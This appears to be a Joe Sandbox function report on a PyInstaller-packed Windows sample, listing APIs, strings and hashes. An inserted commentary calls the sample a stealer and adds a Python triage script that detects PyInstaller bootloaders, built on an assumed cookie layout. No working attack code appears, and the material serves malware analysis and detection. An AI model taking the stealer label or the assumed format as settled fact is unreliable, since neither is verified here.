                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                            • Instruction ID: 607a69ad079a2fd35f929c31d854b51cff3732e6200fdb68f916a560ac1dfe4d
                                                            • Opcode Fuzzy Hash: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                            • Instruction Fuzzy Hash: A721B032A18A4686DB60AF18E440369F3A0EBA5B58FA54234EB5D467DDDBBCD4118B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                            • Instruction ID: 95353a2434b0e06fe433aa03fec3bf79416eab5c7a57ab3ab32d69abfee7bead
                                                            • Opcode Fuzzy Hash: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                            • Instruction Fuzzy Hash: F401A325E08B4940EB10AF5A6404069E795EB67FE8BA88230DF5C037CACEBCD5118310
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7B110BF86,?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2), ref: 00007FF7B110F78D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                            • Instruction ID: 97a9758e94078b147e51e99be244193034fac661b8b28b64839d47ba411acfbf
                                                            • Opcode Fuzzy Hash: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                            • Instruction Fuzzy Hash: 96F04F54F0AB0F42FF547769795A6B5D3809FAAB48FA84430CB0D862C9DEDCA5814231
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF7B1101304,?,?,?,00007FF7B1102816,?,?,?,?,?,00007FF7B1103E09), ref: 00007FF7B110E1DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                            • Instruction ID: de4c43c9ef071e0ee0f5a09b5ae6c7771e5886f68f6cacac7d08611ae698837b
                                                            • Opcode Fuzzy Hash: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                            • Instruction Fuzzy Hash: FFF05424F0A34F44FF54B66A79052B5D3408F76768F980230EF2E453C9DEACA5408130
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: b0cd14334df36586a3d1a66714b126b768492b2c30ff2554616ad4f51034cb89
                                                            • Instruction ID: f23eec77f51004b16e5629c50d636335733772b5f9a7431da1301952f582789a
                                                            • Opcode Fuzzy Hash: b0cd14334df36586a3d1a66714b126b768492b2c30ff2554616ad4f51034cb89
                                                            • Instruction Fuzzy Hash: 3941D816D1C68581EB11AB28D5462FCB360FBB6748FD49232DB8D4219BEF68F2D8C310
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                             • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                            • API String ID: 190572456-4266016200
                                                            • Opcode ID: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                            • Instruction ID: 4b5f1042b43432669bdee26e8ff32039a3fbe3ef682a7e4fe0f347a117865540
                                                            • Opcode Fuzzy Hash: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                            • Instruction Fuzzy Hash: 3512E96890EB0B90EF55AB0DB895174E3A1AF2775CFC51131CA1E4629CFFFCA168C264
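The string set in this function (one "Failed to get address for <symbol>" message per CPython C-API name, next to GetProcAddress) is the PyInstaller bootloader resolving the embedded interpreter's exports at runtime, which is how a Python stealer like this sample ships as a native .exe. The triage script below is an added example, not Joe Sandbox or PyInstaller code: it pulls those symbol names out of a file and parses the archive cookie that PyInstaller appends to the executable to recover the bundled Python version and DLL name. The cookie layout (8-byte magic, four big-endian uint32 fields, 64-byte pylib name) is assumed from PyInstaller's archive header and should be checked against the PyInstaller release that built the sample; the sample bytes in the block are constructed, not taken from the report.

```python
"""Triage check for PyInstaller-packaged samples (added example; not Joe Sandbox or PyInstaller code)."""
import json
import re
import struct
import sys
from typing import Optional

# CArchive magic that marks the appended PyInstaller archive.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# Assumed cookie layout: magic, package length, TOC offset, TOC length,
# python version (major*100+minor), pylib name (NUL-padded). Verify per PyInstaller version.
COOKIE_FMT = "!8sIIII64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88 bytes

# The bootloader emits this text for every CPython symbol it fails to resolve.
_FAILED_RE = re.compile(rb"Failed to get address for (Py[A-Za-z0-9_]+)")


def resolved_symbols(data: bytes) -> list:
    """CPython C-API names the bootloader resolves via GetProcAddress, from its error strings."""
    return sorted({m.group(1).decode() for m in _FAILED_RE.finditer(data)})


def parse_cookie(data: bytes) -> Optional[dict]:
    """Locate the last archive cookie (the appended one, not the bootloader's own copy) and decode it."""
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    return {
        "package_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
        "python_version": f"{pyvers // 100}.{pyvers % 100}",
        "pylib": pylib.rstrip(b"\0").decode(errors="replace"),
    }


def triage(data: bytes) -> dict:
    """Combine both indicators: symbol strings alone are weak, strings plus a valid cookie are strong."""
    syms = resolved_symbols(data)
    cookie = parse_cookie(data)
    return {"symbols": syms, "cookie": cookie, "pyinstaller": bool(syms) and cookie is not None}


# Constructed stand-in for a PyInstaller onefile executable (not bytes from the analysed sample).
_BOOTLOADER_STRINGS = b"\0".join([
    b"Failed to get address for Py_InitializeFromConfig",
    b"Failed to get address for PyRun_SimpleStringFlags",
    b"Failed to get address for PyMarshal_ReadObjectFromString",
    b"GetProcAddress",
])
_COOKIE = struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC, 4096, 3900, 196, 311, b"python311.dll")
SAMPLE = b"MZ" + _BOOTLOADER_STRINGS + b"\0" * 64 + b"PYZ-00.pyz" + _COOKIE


if __name__ == "__main__":
    # Usage: python pyi_triage.py <file.exe>; with no argument the constructed SAMPLE is scanned.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(json.dumps(triage(blob), indent=2))
```

A hit on the symbol strings without a cookie usually means a bootloader whose archive was stripped or a partial dump; the cookie's pylib field tells you which python3xx.dll to expect alongside the unpacked payload, and the TOC fields are the starting point for carving the PYZ with a dedicated extractor.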
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                             • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 808467561-2761157908
                                                            • Opcode ID: ee6ddb9c22397a02ef7f89c4ae9451cd5ee51806b236cf38c383584f5dc4b0f7
                                                            • Instruction ID: f4802f65980e6c614c626644069e3e073edf090e3f3d0de2f874c21bb4626f79
                                                            • Opcode Fuzzy Hash: ee6ddb9c22397a02ef7f89c4ae9451cd5ee51806b236cf38c383584f5dc4b0f7
                                                            • Instruction Fuzzy Hash: 85B21A72E182868BE7A49E28E4407FCF7A1FB6734CF815135DB0957A8CDBB8A510CB50
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00007FF7B10F2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F8587
                                                            • FormatMessageW.KERNEL32 ref: 00007FF7B10F85B6
                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF7B10F860C
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                            • API String ID: 2920928814-3505189403
                                                            • Opcode ID: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                            • Instruction ID: cec61defdc970f45ae875accb683576ebbb191fb7e2cc505c625211cb7d08493
                                                            • Opcode Fuzzy Hash: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                            • Instruction Fuzzy Hash: 6921516160CA4682FB20EB59F8852A9E361BB6A78CFC40135D74D826ACEFBCD1158720
                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                            • Instruction ID: 43bde53a621ff0dd4b021b8292785c0cee4c040f568251dc01d4c9a533fb1315
                                                            • Opcode Fuzzy Hash: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                            • Instruction Fuzzy Hash: DC319272608B8586EB60AF65E8807EDB360FB95748F44403ADB4E47B98DF7CD158C720
                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                            • Instruction ID: 2ed63f9481a2b1971fad650c04083f3517250996f5dfbe633a6407e10b415811
                                                            • Opcode Fuzzy Hash: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                            • Instruction Fuzzy Hash: 02318F36608B8586DB209F29E8402AEB3A4FB99758F904136EB8D43B98DF7CD155CB10
                                                            APIs
                                                            Similarity
                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2227656907-0
                                                            • Opcode ID: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                            • Instruction ID: 926a12511ecdbf04c9a8ce49bbade97c08ec637269fc19364d7d51d33298d6c6
                                                            • Opcode Fuzzy Hash: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                            • Instruction Fuzzy Hash: B7B12A22B1868A41EB60EB29B4041B9E351EB66BD8FA54131EF5E47BCDDFBCE451C310
                                                            APIs
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                            • Instruction ID: ff069b71aefb6d7a95bb288b12d50c312e0eaead17e00bf0c6334a6cf18ace56
                                                            • Opcode Fuzzy Hash: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                            • Instruction Fuzzy Hash: E5115126B14F068AEB00DF65E8452B873A4F76A758F440E31DB6D42768DFBCD1648350
                                                            APIs
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                            • Instruction ID: 774500523e0fc6ef9eb86275ab574905b1c049c5d65c277359fe1180dbce7997
                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                            • Instruction Fuzzy Hash: 3DC11572B1868A87D734DF19B04476AF791F7A5B88F868134DB4A63B48DB7DE810CB00
                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 48b97647827edafc3b78799631f3641f64fd5a0bbb932a3008f366d071470ff1
                                                            • Instruction ID: 214f6e890d4ba46db86751507cc74c5d4e497647bd8cf91e3316236958605937
                                                            • Opcode Fuzzy Hash: 48b97647827edafc3b78799631f3641f64fd5a0bbb932a3008f366d071470ff1
                                                            • Instruction Fuzzy Hash: BEB19D77601B888BE715DF2DE446368BBA0FB91B4CF168821DB5D837A8CB79D462C710
                                                            APIs
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                            • Instruction ID: 88abc29d4fb97e2e826211f7b89b02277630e7754eafcce359bbde78350b30fc
                                                            • Opcode Fuzzy Hash: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                            • Instruction Fuzzy Hash: A0F08162A1C68986E760AF68B48A7A6F351AB55728F840236D76D026D8DFBCD0188A10
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-227171996
                                                            • Opcode ID: 92ab44aa671049a5d726c4e1cd9e81523bdb76ab1b5bae976e988b650b47c5f7
                                                            • Instruction ID: 79540d4f60d288bdd6902f8762309cf4b0595f057e032c8937b357b589d6f5c6
                                                            • Opcode Fuzzy Hash: 92ab44aa671049a5d726c4e1cd9e81523bdb76ab1b5bae976e988b650b47c5f7
                                                            • Instruction Fuzzy Hash: 66E1E832E0864A81E764AE1DB09813CA3A0FF66B4CFB45135DB4E57E98DFB9E851C310
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e+000$gfff
                                                            • API String ID: 0-3030954782
                                                            • Opcode ID: 414bc82e88e4b1ba2530bd57a0790f599c7f8d835f00ab403542f9b81ab3ad6c
                                                            • Instruction ID: e4e2d315bb44f54225db17ee3c898a35c92bb22bfbeae456b3304d1ed2ce454a
                                                            • Opcode Fuzzy Hash: 414bc82e88e4b1ba2530bd57a0790f599c7f8d835f00ab403542f9b81ab3ad6c
                                                            • Instruction Fuzzy Hash: B3519D22F096C942E724DE3AB904769FB91F756B98F98C231CB5847AC9CFBDD4408710
                                                            Similarity
                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                            • String ID:
                                                            • API String ID: 1010374628-0
                                                            • Opcode ID: daa1868950d22527141b3bb5e52a58b64e58f1e29eb8866760703242d5ff76be
                                                            • Instruction ID: ebd85ea7c23df156746120f8c27b81cc2a0a0437996fe961046d083419bc4f62
                                                            • Opcode Fuzzy Hash: daa1868950d22527141b3bb5e52a58b64e58f1e29eb8866760703242d5ff76be
                                                            • Instruction Fuzzy Hash: 5A02A221E0D64E80FB64BB397404279D695AF23B98FDA4534DF6D463DAEEFCA4118320
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfffffff
                                                            • API String ID: 0-1523873471
                                                            • Opcode ID: bb93477e02d4e941dcb5b3cdf68f9d2c091b313a0377ba104bac55ee011317e1
                                                            • Instruction ID: 87600d39f2e7370ea2783bce85b6c220fadfd56f8966252c261f600c9635f85e
                                                            • Opcode Fuzzy Hash: bb93477e02d4e941dcb5b3cdf68f9d2c091b313a0377ba104bac55ee011317e1
                                                            • Instruction Fuzzy Hash: C4A16862F097C986EB21DB2AB0047A9BB90EB627C8F548032DF8D47799EE7DD501C711
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: TMP
                                                            • API String ID: 3215553584-3125297090
                                                            • Opcode ID: f418ac5b73ce95224f4cdc4c7ad8bddcd0a3b001ad5768b3b557a0f5eb967220
                                                            • Instruction ID: ccafddb6ebb38f7e62bf125309c1b33371bcfe6115f3ec492186e8f930b26e5f
                                                            • Opcode Fuzzy Hash: f418ac5b73ce95224f4cdc4c7ad8bddcd0a3b001ad5768b3b557a0f5eb967220
                                                            • Instruction Fuzzy Hash: DF519F04F0C25A41EB64B62A791917ED391EF76B8CFB84135DF1D4779AEEBCE4114220
                                                            APIs
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 9cb1cd12b35fa318c4a8e0929622bdae7cba3dd6c324a68b4e8dcf83c52a71e5
                                                            • Instruction ID: 12660304d761bc039b70bbaff6ce8d7c2d28524e84c6e8a7e279891bf15262c8
                                                            • Opcode Fuzzy Hash: 9cb1cd12b35fa318c4a8e0929622bdae7cba3dd6c324a68b4e8dcf83c52a71e5
                                                            • Instruction Fuzzy Hash: 7EB09220E07A0AC2EB083B1A7C82214A2A47F69714FD54038C70C41328EE6C20B54721
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1c086197733176920e670542d9d571295f110a1a04111a447b2e9bf7cf9f205
                                                            • Instruction ID: 43c047202b1a57e25de51719265f9d7244e62e618eac9d7b68dd9722d2e6c92e
                                                            • Opcode Fuzzy Hash: b1c086197733176920e670542d9d571295f110a1a04111a447b2e9bf7cf9f205
                                                            • Instruction Fuzzy Hash: 38D12C22D1865A89E728EE2DA04827DA760EB26B4CFB44235CF0D136DDCFB9D941C364
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5e7c7d6f5738ce9ae6dae89df256b28c6339b9d8c2370fd2cf9ecf49eca8280
                                                            • Instruction ID: cca4258929f0f51c799642d5f32213c3a09f050e4559e2d56bb95e31ec336cf4
                                                            • Opcode Fuzzy Hash: e5e7c7d6f5738ce9ae6dae89df256b28c6339b9d8c2370fd2cf9ecf49eca8280
                                                            • Instruction Fuzzy Hash: 12C1A4722241E18BD3C9EB39E46947AB3A1FB99349FC4413AEB8747B89C63CE015D710
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c9ed06f36b3d533f088c72f27e683e59507fd20484e083b1e58df30cf10ceb8
                                                            • Instruction ID: f2301d1af779ece587481e192be0f364d68b222e8eeaef883f6bd8561707f8b0
                                                            • Opcode Fuzzy Hash: 7c9ed06f36b3d533f088c72f27e683e59507fd20484e083b1e58df30cf10ceb8
                                                            • Instruction Fuzzy Hash: 18B1C07292874989E7659F2DE04813CBBA0E716B4CFB44135CB4E47399CFBAE641C728
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
